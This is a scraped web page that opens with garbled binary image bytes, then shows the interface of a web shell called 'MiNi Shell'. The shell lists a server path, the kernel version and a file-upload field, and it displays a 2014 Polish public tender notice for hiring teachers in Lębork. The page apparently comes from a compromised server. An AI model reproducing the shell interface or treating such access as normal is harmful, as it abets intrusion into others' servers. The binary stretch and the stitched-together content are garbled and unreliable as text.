JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140613/128131-N-2014.html

<p class="kh_header"><b>Lębork: Przedmiotem zamówienia jest zatrudnienie nauczycieli i nauczycielek w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku oraz Zespole Szkół Mechaniczno-Informatycznych w Lęborku, którzy opracują autorskie programy nauczania na podstawie zdiagnozowanych potrzeb uczniów i uczennic oraz przeprowadzą cykl zajęć wyrównawczych na rok szkolny 2014/2015 w ramach projektu pn. ZaPaL się do zawodu - Zawodowo w Powiecie Lęborskim</b><br>
<b>Numer ogłoszenia: 128131 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> powiat-lebork.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zatrudnienie nauczycieli i nauczycielek w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku oraz Zespole Szkół Mechaniczno-Informatycznych w Lęborku, którzy opracują autorskie programy nauczania na podstawie zdiagnozowanych potrzeb uczniów i uczennic oraz przeprowadzą cykl zajęć wyrównawczych na rok szkolny 2014/2015 w ramach projektu pn. ZaPaL się do zawodu - Zawodowo w Powiecie Lęborskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia 
Przedmiotem zamówienia jest zatrudnienie nauczycieli/nauczycielek w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku oraz Zespole Szkół Mechaniczno-Informatycznych w Lęborku, którzy opracują autorskie programy nauczania na podstawie zdiagnozowanych potrzeb uczniów i uczennic oraz przeprowadzą cykl zajęć wyrównawczych na rok szkolny 2014/2015 w ramach projektu pn. ZaPaL się do zawodu - Zawodowo w Powiecie Lęborskim w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki.

2.	Cele projektu
Celem głównym projektu jest podniesienie atrakcyjności i jakości oferty edukacyjnej, procesu kształcenia czterech szkół ponadgimnazjalnych (2 technika, 2 zasadnicze szkoły zawodowe) prowadzonych przez Powiat Lęborski (Zespół Szkół Mechaniczno-Informatycznych w Lęborku, Powiatowe Centrum Edukacyjne - Zespół Szkół Ponadgimnazjalnych w Lęborku) służący zmniejszeniu dysproporcji w osiągnięciach 1.000 uczniów (250 kobiet i 750 mężczyzn) i podniesieniu zdolności do przyszłego zatrudnienia przez realizację programów rozwojowych (kompleksowych, opartych o diagnozę, rozszerzających ofertę edukacyjną) trwale przyczyniających się do zmian w funkcjonowaniu ww. szkół (wyposażenie szkół w nowoczesne materiały dydaktyczne) do 28.08.2015 r.
Cel ten zostanie zrealizowany poprzez organizację i przeprowadzenie bezpłatnych dodatkowych zajęć pozalekcyjnych, pozaszkolnych, wyrównawczych i pozostałych działań w ramach projektu ZaPaL się do zawodu - Zawodowo w Powiecie Lęborskim współfinansowanego ze środków Unii Europejskiej (Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki).

3.	Adresaci
Grupę docelową stanowią w 100% osoby spełniające równocześnie następujące warunki:
- uczniowie 4 szkół ponadgimnazjalnych (2 Technika i 2 Zasadnicze Szkoły Zawodowe w ramach Zespołu Szkół Mechaniczno-Informatycznych i Powiatowego Centrum Edukacyjnego - Zespołu Szkół Ponadgimnazjalnych w Lęborku), prowadzących kształcenie zawodowe na terenie powiatu lęborskiego - Powiatowego Centrum Edukacyjnego - Zespołu Szkół Ponadgimnazjalnych w Lęborku i Zespołu Szkół Mechaniczno-Informatycznych w Lęborku,
- posiadający miejsce zamieszkania (w rozumieniu przepisów Kodeksu Cywilnego) na terenie województwa pomorskiego.

Zamówienie zostało podzielone na dwadzieścia cztery (24) części. Opis szczegółowy każdej części zamówienia określono 
w Załączniku nr 1 do SIWZ. Wykonawca może złożyć ofertę na dowolną liczbę części zamówienia gwarantując należyte wykonanie każdego ze zleceń.

Przedmiot zamówienia obejmuje: 
Część 1 - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z matematyki na poziomie szkoły zawodowej
Część 2 - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka polskiego na poziomie szkoły zawodowej 
Część 3 - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z matematyki na poziomie technikum - grupa 1
Część 4 - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z matematyki na poziomie technikum - grupa 2
Część 5 - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka polskiego na poziomie technikum - grupa 1
 Część 6 - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka polskiego na poziomie technikum - grupa 2
Część 7 - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka angielskiego na poziomie technikum - grupa 1
Część 8 - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka angielskiego na poziomie technikum - grupa 2
Część 9 - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie z diagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych w zakresie języka niemieckiego na poziomie technikum - grupa 1
Część 10 - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka niemieckiego na poziomie technikum - grupa 2
Część 11 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Podstawy konstrukcji maszyn na poziomie szkoły zawodowej - grupa 1
Część 12 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Podstawy konstrukcji maszyn na poziomie szkoły zawodowej- grupa 2
Część 13 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Podstawy konstrukcji maszyn na poziomie technikum- grupa 1
Część 14 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć Podstawy konstrukcji maszyn na poziomie technikum- grupa 2
Część 15 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Elektronika i elektrotechnika na poziomie szkoły zawodowej
Część 16 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Elektronika i elektrotechnika na poziomie technikum
Część 17 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Maszyny elektryczne na poziomie technikum
Część 18 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Systemy komputerowe na poziomie technikum
Część 19 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Liczby zespolone w elektrotechnice na poziomie technikum- grupa 1
Część 20 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Liczby zespolone w elektrotechnice na poziomie technikum- grupa 2
Część 21 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Funkcje trygonometryczne w elektrotechnice na poziomie technikum- grupa 1
Część 22 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Funkcje trygonometryczne w elektrotechnice na poziomie technikum- grupa 2
Część 23 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Funkcje trygonometryczne w mechanice na poziomie technikum- grupa 1
Część 24 - Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Funkcje trygonometryczne w mechanice na poziomie technikum- grupa 2

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do niniejszej specyfikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania jedną osobą zdolną do wykonania zamówienia na każdą część zamówienia, na którą składa ofertę, która posiada kwalifikacje do zajmowania stanowiska nauczyciela w technikach (§2), zasadniczych szkołach zawodowych (§3) lub do zajmowania stanowiska nauczyciela języków obcych (§11 ust. 2) określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji, wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2013, poz. 1207) i dodatkowo posiadającą:
- w ostatnich 3 latach, co najmniej 2- letni staż pracy w szkole ponadgimnazjalnej
- wykształcenie wyższe (studia pierwszego stopnia, inżynierskie, magisterskie lub podyplomowe) uprawniające do nauczania danego przedmiotu w szkole zawodowej/technikum odpowiednio do każdej części zamówienia
- posiada przygotowanie pedagogiczne 

Ocena wykazania spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w pkt. 4.1. tj. według załącznika nr 5 oraz oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp (załącznik nr 3)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W celu potwierdzenia spełniania opisanych przez Zamawiającego warunków udziału w postępowaniu, Wykonawcy ubiegający się o udzielenie niniejszego zamówienia obowiązani są przedłożyć:
-	wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - zał. nr 2 do SIWZ
-	oświadczenie w trybie art. 22 ust. 1 w związku z art. 44 ustawy Pzp z wykorzystaniem wzoru - zał. nr 3 do SIWZ
-	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia spełniające określone wymagania (uprawnienia do nauczania; w ostatnich 3 latach, co najmniej 2- letni staż pracy w szkole ponadgimnazjalnej) - zał. nr 5 do SIWZ
-	zobowiązanie podmiotu trzeciego o oddanie do dyspozycji Wykonawcy swoich zasobów, umiejętności, kwalifikacji i doświadczenia na okres korzystania z nich podczas realizacji - zał. nr 8 do SIWZ

2.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 i 2 ustawy należy złożyć następujące dokumenty:

-	oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 i 2 ustawy Pzp z wykorzystaniem wzoru - zał. nr 4 do SIWZ 
-	oświadczenie o przynależności do grupy kapitałowej - zał. nr 6 do SIWZ
W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty potwierdzające, że Wykonawca nie podlega wykluczeniu składa każdy wykonawca oddzielnie. 

3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia obowiązani są załączyć do oferty pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego. 

4.	Zamawiający wymaga wskazania w ofercie części zamówienia, których wykonanie Wykonawca zamierza powierzyć Podwykonawcom (jeżeli Wykonawca przewiduje taki udział)

5.	W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedstawia dokumenty jak wyżej, wypełnione w języku polskim bądź z tłumaczeniem na język polski potwierdzone za zgodność z oryginałem przez Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)	zmiany w nazwie, oznaczeniu, siedzibie, numerze konta bankowego Zamawiającego lub Wykonawcy dokonanej 
w trakcie trwania umowy
b)	przesunięcia terminu wykonania przedmiotu zamówienia,
c)	zmiany osób dedykowanych do realizacji przedmiotu umowy w przypadku niemożliwości wykonywania przez nich powierzonych czynności z przyczyn obiektywnych i niezależnych od Wykonawcy, np. choroby potwierdzonej zwolnieniem lekarskim czy urlopu macierzyńskiego. Nowa osoba musi być zatwierdzona przez Zamawiającego z zastrzeżeniem, że osoba będzie posiadała kwalifikacje i doświadczenie nie niższe niż określone w ofercie. 
Wszelkie zmiany postanowień niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności.
Wykonawca jest zobowiązany pisemnie poinformować o zmianie, o której mowa powyżej i uzyskać zgodę Zamawiającego na jej wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego.</p>
